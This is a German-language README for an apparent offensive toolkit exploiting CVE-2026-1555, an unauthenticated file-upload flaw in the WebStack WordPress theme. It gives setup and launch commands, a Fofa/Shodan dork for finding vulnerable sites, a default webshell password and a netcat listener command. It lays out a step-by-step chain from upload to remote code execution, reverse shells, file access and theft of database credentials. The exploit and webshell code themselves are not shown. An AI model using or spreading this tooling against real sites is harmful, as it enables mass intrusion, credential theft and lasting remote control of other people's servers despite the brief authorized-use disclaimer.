
Automatisiertes Exploit-Toolkit für CVE-2026-1555, eine kritische, nicht authentifizierte Datei-Upload-RCE im WebStack WordPress-Theme. Bietet eine PyQt5-GUI, Dork-basierte Zielentdeckung und eine multifunktionale PHP-Webshell für die Post-Exploitation.
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██╔════╝
██║ ██║ ██║█████╗ █████╔╝██║██╔██║ █████╔╝███████╗
██║ ╚██╗ ██╔╝██╔══╝ ██╔═══╝ ████╔╝██║██╔═══╝ ██╔═══██╗
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗╚██████╔╝
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝ ╚═════╝
WordPress WebStack Theme — Nicht authentifizierte Remote-Code-Ausführung
Nur für Bildungszwecke und autorisierte Penetrationstests.
CVE-2026-1555 ist eine kritische Schwachstelle, die das WebStack WordPress Theme betrifft und es nicht authentifizierten Angreifern ermöglicht, beliebige Dateien hochzuladen, was zu einer Remote Code Execution (RCE) auf dem Zielserver führt.
Dieses Toolkit (FriendsExploit) automatisiert die Erkennung und Ausnutzung angreifbarer Ziele mit einer sauberen PyQt5-GUI und integrierter Dork-Suche.
Zieloberfläche → WordPress-Seiten mit WebStack-Theme
Schwachstellentyp → Nicht authentifiziertes beliebiges Datei-Upload → RCE
CVSS-Score → 9.8 (Kritisch)
Authentifizierung erforderlich → Keine
Payload → ms.php (Multifunktions-PHP-Webshell)
CVE-2026-1555-Linux/
│
├── CVE-2026-1555.py # Haupt-Exploit-Tool (PyQt5-GUI)
├── ms.php # PHP-Webshell-Payload
├── Dork.txt # Fofa/Shodan-Dork zur Zielerkennung
├── requirements.txt # Python-Abhängigkeiten
└── README.md # Du bist hier
| Voraussetzung | Version |
|---|---|
| Python | 3.8+ |
| PyQt5 | ≥ 5.15.0 |
| requests | ≥ 2.31.0 |
| urllib3 | ≥ 2.0.0 |
git clone https://github.com/YOUR_USERNAME/CVE-2026-1555-Linux.git
cd CVE-2026-1555-Linux
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
Kali / Debian-Benutzer — falls PyQt5 per pip fehlschlägt, installieren Sie es zuerst systemweit:
sudo apt install python3-pyqt5 -y
python3 CVE-2026-1555.py
Die GUI wird gestartet. Laden Sie Ziele manuell oder verwenden Sie den integrierten Dork-Scanner.
ms.phpNach erfolgreicher Ausnutzung lädt das Tool ms.php auf das Ziel hoch.
https://target.com/wp-content/themes/WebStack/ms.php
Standardpasswort: fr13nds2026
Starten Sie auf Ihrer Maschine einen Listener:
nc -lvnp 4444
Im REVSHELL-Tab der Webshell → IP und Port eingeben → FIRE drücken.
Fofa / Shodan-Dork (aus Dork.txt):
body="wp-content/themes/WebStack"
Fügen Sie es in Fofa oder Shodan ein, um verwundbare Ziele zu ermitteln.
[1] Ziel per Dork-Scan erkennen
↓
[2] Installation des WebStack-Themes bestätigen
↓
[3] Angreifbaren Upload-Endpunkt auslösen (keine Authentifizierung erforderlich)
↓
[4] ms.php-Payload in das Webroot hochladen
↓
[5] Webshell aufrufen → RCE erzielen
↓
[6] Eskalieren: DB-Zugangsdaten auslesen, pivotieren, Revshell
PyQt5-Anzeigefehler auf headless-Server:
export DISPLAY=:0
# or use Xvfb
sudo apt install xvfb -y
Xvfb :0 -screen 0 1024x768x24 &
export DISPLAY=:0
python3 CVE-2026-1555.py
pip install schlägt für PyQt5 fehl:
sudo apt install python3-pyqt5 python3-pyqt5.qtwebengine -y
Zugriffsverweigerung beim Ausführen des Skripts:
chmod +x CVE-2026-1555.py
python3 CVE-2026-1555.py
requests/urllib3 SSL-Fehler:
pip install --upgrade requests urllib3 certifi
git clone https://github.com/YOUR_USERNAME/CVE-2026-1555-Linux.git && \
cd CVE-2026-1555-Linux && \
python3 -m venv venv && source venv/bin/activate && \
pip install -r requirements.txt -q && \
python3 CVE-2026-1555.py
Dieses Tool ist ausschließlich für autorisierte Sicherheitsforschung und Penetrationstests
bestimmt. Die Autoren übernehmen keine Verantwortung für Missbrauch oder Schäden, die durch
dieses Programm verursacht werden. Verwenden Sie es nur gegen Systeme, die Ihnen gehören
oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben. Die unbefugte
Nutzung ist illegal.
FriendsExploit • CVE-2026-1555 • Linux Edition
Entwickelt für Forscher. Verantwortungsvoll nutzen.
| OS |
| Linux (Debian/Ubuntu/Kali empfohlen) |
| Modul | Beschreibung |
|---|
| 🖥️ SYSINFO | PHP-Version, Betriebssystem, aktueller Benutzer, Safe-Mode-Status, Server-Variablen |
| 💻 TERMINAL | Vollständige Befehlsausführung mit Live-Ausgabe — unterstützt 6 Exec-Methoden |
| 📂 FILES | Lesen / Schreiben / Bearbeiten / Löschen / Herunterladen beliebiger Dateien auf dem Server |
| 📤 UPLOAD | Dateien in beliebige Pfade hochladen oder entfernte Dateien per wget/curl abrufen |
| 🔄 REVSHELL | Reverse-Shell mit einem Klick + vorgefertigte bash/python3/perl/nc/php-Shells |
| 🗄️ DB SCAN | Automatische Erkennung von wp-config.php, DB-Zugangsdaten auslesen, manueller MySQL-Runner |
| Feld | Info |
|---|
| CVE ID | CVE-2026-1555 |
| Betroffene Software | WebStack WordPress Theme |
| Schwachstellentyp | Nicht authentifiziertes beliebiges Datei-Upload → RCE |
| Angriffsvektor | Netzwerk |
| Authentifizierung | Nicht erforderlich |
| CVSS v3-Score | 9.8 Kritisch |
| Betroffene Versionen | Alle Versionen vor dem Patch |